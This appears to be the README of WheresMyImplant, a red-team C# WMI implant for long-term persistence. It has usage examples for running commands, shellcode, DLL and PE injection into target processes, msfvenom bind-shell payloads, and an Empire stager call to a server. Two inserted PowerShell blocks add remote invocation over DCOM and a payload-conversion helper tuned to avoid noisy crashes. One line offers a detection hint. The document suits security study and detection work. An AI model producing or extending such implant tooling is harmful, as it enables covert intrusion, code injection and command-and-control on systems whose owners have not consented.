WheresMyImplant: A C# WMI Provider for long term persistence
This WMI provider exposes methods to execute commands, inject payloads, and launch an Empire agent while keeping a low profile on the host.
This is related to the project PowerProvider - https://github.com/0xbadjuju/PowerProvider/
PowerProvider provides the deployment methods for the implant.
To compile, generate your signing key with the command: sn -k sgKey.snk
While primarily designed for use with WMI, WheresMyImplant can also be loaded directly with PowerShell reflection:
[System.Reflection.Assembly]::LoadFile("C:\temp\WheresMyImplant.dll")
[WheresMyImplant.Implant]::InjectShellCode($payload,9976)
Methods
-
RunCMD
- Parameters: Command, Parameters
- Example:
Invoke-CimMethod -ClassName Win32_Implant -Name RunCMD -Arguments @{
command="ipconfig";
parameter="/all"
};
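The README's examples call the implant on the local host with Invoke-CimMethod's defaults. The following is an added example, not code from the WheresMyImplant or PowerProvider projects, showing how the same RunCMD call is made against a remote host over a CIM session, with a check that the Win32_Implant class (assumed here to live in root\cimv2, which is the namespace Invoke-CimMethod uses by default) is actually registered before the method is invoked. The host name, credential prompt and the Invoke-ImplantCmd wrapper are assumptions for illustration.

```powershell
# Added example (not part of WheresMyImplant): invoke RunCMD on a remote host.
# Assumptions: Win32_Implant is registered in root\cimv2 (the README relies on
# Invoke-CimMethod's default namespace), and the argument keys match the README's
# RunCMD example (command, parameter).
function Invoke-ImplantCmd {
    param(
        [Parameter(Mandatory)] [string] $ComputerName,
        [Parameter(Mandatory)] [pscredential] $Credential,
        [Parameter(Mandatory)] [string] $Command,
        [string] $Parameters = ''
    )

    # DCOM reaches hosts that have WinRM disabled; drop -SessionOption to use WSMan instead.
    $opt     = New-CimSessionOption -Protocol Dcom
    $session = New-CimSession -ComputerName $ComputerName -Credential $Credential -SessionOption $opt
    try {
        # Fail early with a clear message if the provider is not installed,
        # instead of an opaque "class not found" CIM error from the method call.
        $class = Get-CimClass -CimSession $session -Namespace 'root\cimv2' `
                              -ClassName Win32_Implant -ErrorAction SilentlyContinue
        if (-not $class) {
            throw "Win32_Implant is not registered on $ComputerName"
        }
        if ($class.CimClassMethods.Name -notcontains 'RunCMD') {
            throw "Win32_Implant on $ComputerName does not expose RunCMD"
        }

        # Same call as the README's local example, routed through the session.
        return Invoke-CimMethod -CimSession $session -Namespace 'root\cimv2' `
                                -ClassName Win32_Implant -MethodName RunCMD -Arguments @{
            command   = $Command
            parameter = $Parameters
        }
    }
    finally {
        # Always tear the session down, even when the checks above throw.
        Remove-CimSession -CimSession $session
    }
}

# Usage (host name is a placeholder):
$cred = Get-Credential
Invoke-ImplantCmd -ComputerName 'target.corp.local' -Credential $cred -Command 'ipconfig' -Parameters '/all'
```

Get-CimClass is also the quickest way for a defender to confirm whether this provider is present on a host: a Win32_Implant class in root\cimv2 is not something a stock Windows install carries.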
-
RunPowerShell
- Parameters: Command
- Example:
Invoke-CimMethod -ClassName Win32_Implant -Name RunPowerShell -Arguments @{
command="whoami"
};
-
RunXpCmdShell
- Parameters: Server, Database, UserName, Password, Command
- Example:
Invoke-CimMethod -ClassName Win32_Implant -Name RunXpCmdShell -Arguments @{
command="whoami";
database="";
server="sqlserver";
username="sa";
password="password"
};
-
InjectShellCode
- Parameters: ShellCodeString, ProcessId
- Example:
msfvenom -p windows/x64/exec --format csharp CMD=calc.exe > file.txt
Delete the byte[] declaration from the output, leaving only the comma-separated 0x.. byte values, and pass them as a single string in $payload.
Invoke-CimMethod -ClassName Win32_Implant -Name InjectShellCode -Arguments @{
shellCodeString=$payload;
processId=432
};
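The step "delete the byte declaration" is easy to get wrong by hand (a stray `new byte[N]` or trailing `};` ends up in the string). The following added example, which is not code from the WheresMyImplant project, reads the msfvenom --format csharp output and produces the comma-separated byte string the README passes as $payload, checking that the number of bytes recovered matches the length msfvenom declared. It assumes InjectShellCode accepts the string exactly as the README describes it (the 0x.. list with the declaration removed); the function name ConvertFrom-MsfCSharp and the file path are placeholders.

```powershell
# Added example (not part of WheresMyImplant): build $payload from
# "msfvenom --format csharp" output instead of editing the file by hand.
# Assumption: InjectShellCode takes the comma-separated "0xfc,0x48,..." string
# that remains once the byte[] declaration is deleted, as the README describes.
function ConvertFrom-MsfCSharp {
    param(
        [Parameter(Mandatory)] [string] $Path   # file written by msfvenom --format csharp
    )

    $text = Get-Content -Path $Path -Raw

    # msfvenom emits:  byte[] buf = new byte[N] { 0xfc,0x48,... };
    # Keep only the 0x.. tokens; that is what "delete the byte declaration" leaves.
    $bytes = [regex]::Matches($text, '0x[0-9a-fA-F]{2}') | ForEach-Object { $_.Value }
    if (-not $bytes -or $bytes.Count -eq 0) {
        throw "No shellcode bytes found in $Path"
    }

    # Sanity check: the declared array length must match the bytes we kept,
    # otherwise the file was truncated or contains more than one buffer.
    if ($text -match 'new byte\[(\d+)\]') {
        $declared = [int]$Matches[1]
        if ($declared -ne $bytes.Count) {
            throw "msfvenom declared $declared bytes but $($bytes.Count) were found in $Path"
        }
    }

    return ($bytes -join ',')
}

# Usage: same call as the README, with $payload produced by the function above.
$payload = ConvertFrom-MsfCSharp -Path 'C:\temp\file.txt'
Invoke-CimMethod -ClassName Win32_Implant -MethodName InjectShellCode -Arguments @{
    shellCodeString = $payload
    processId       = 432
}
```

The length check matters because a payload that parses to fewer bytes than msfvenom generated will still be injected and then crash the target process, which is far noisier than a failed method call.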
-
InjectShellCodeWMFIFSB4
- Parameters: WmiClass, FileName, ProcessId
- Example:
msfvenom -p windows/x64/exec --format csharp CMD=calc.exe
The shellcode must already be stored under the given FileName in the WMIFS WMI class on the host before this method is called.
Invoke-CimMethod -ClassName Win32_Implant -Name InjectShellCodeWMFIFSB4 -Arguments @{
WmiClass="WMIFS";
FileName="CalcShellCode";
processId=432
};
-
InjectDll
- Parameters: Library, ProcessId
- Example:
msfvenom -p windows/x64/shell_bind_tcp --format dll --arch x64 > /tmp/bind64.dll
Invoke-CimMethod -ClassName Win32_Implant -Name InjectDll -Arguments @{
library = "\\host\share\bind64.dll";
processId = 3372
};
-
InjectDllWMIFS
- Parameters: WmiClass, FileName, ProcessId
- Example (the DLL must already be stored under the given FileName in the WMIFS WMI class):
msfvenom -p windows/x64/shell_bind_tcp --format dll --arch x64 > /tmp/bind64.dll
Invoke-CimMethod -ClassName Win32_Implant -Name InjectDllWMIFS -Arguments @{
WmiClass = "WMIFS";
FileName = "bind64.dll";
processId = 3372
};
-
InjectPeFile
- Parameters: FileName, Parameters, ProcessId
- Example:
msfvenom -p windows/x64/shell_bind_tcp --format exe --arch x64 > /tmp/bind64.exe
Invoke-CimMethod -ClassName Win32_Implant -Name InjectPeFile -Arguments @{
FileName = "C:\bind64.exe";
Parameters = "";
ProcessId = 5648
};
-
InjectPeString
- Parameters: PeString, Parameters, ProcessId
- Example:
msfvenom -p windows/x64/shell_bind_tcp --format exe --arch x64 > /tmp/bind64.exe
Invoke-CimMethod -ClassName Win32_Implant -Name InjectPeString -Arguments @{
PeString = $peString;   # the PE passed as a string rather than a path
Parameters = "";
ProcessId = 5648
};
-
InjectPeWMIFS
- Parameters: WmiClass, FileName, Parameters, ProcessId
- Example (the executable must already be stored under the given FileName in the WMIFS WMI class):
msfvenom -p windows/x64/shell_bind_tcp --format exe --arch x64 > /tmp/bind64.exe
Invoke-CimMethod -ClassName Win32_Implant -Name InjectPeWMIFS -Arguments @{
WmiClass = "WMIFS";
FileName = "bind64.exe";
Parameters = "";
ProcessId = 5648
};
-
Empire
- Parameters: Server, StagingKey, Language
- Example (Language selects the PowerShell or dotnet stager):
Invoke-CimMethod -ClassName Win32_Implant -Name EmpireStager -Arguments @{
Server = $Server;
StagingKey = $StagingKey;
Language = "PowerShell"
};
Invoke-CimMethod -ClassName Win32_Implant -Name EmpireStager -Arguments @{
Server = $Server;
StagingKey = $StagingKey;
Language = "dotnet"
};
Author, Contributors, and License
Author: Alexander Leary (@0xbadjuju), NetSPI - 2017
License: BSD 3-Clause
Required Dependencies: None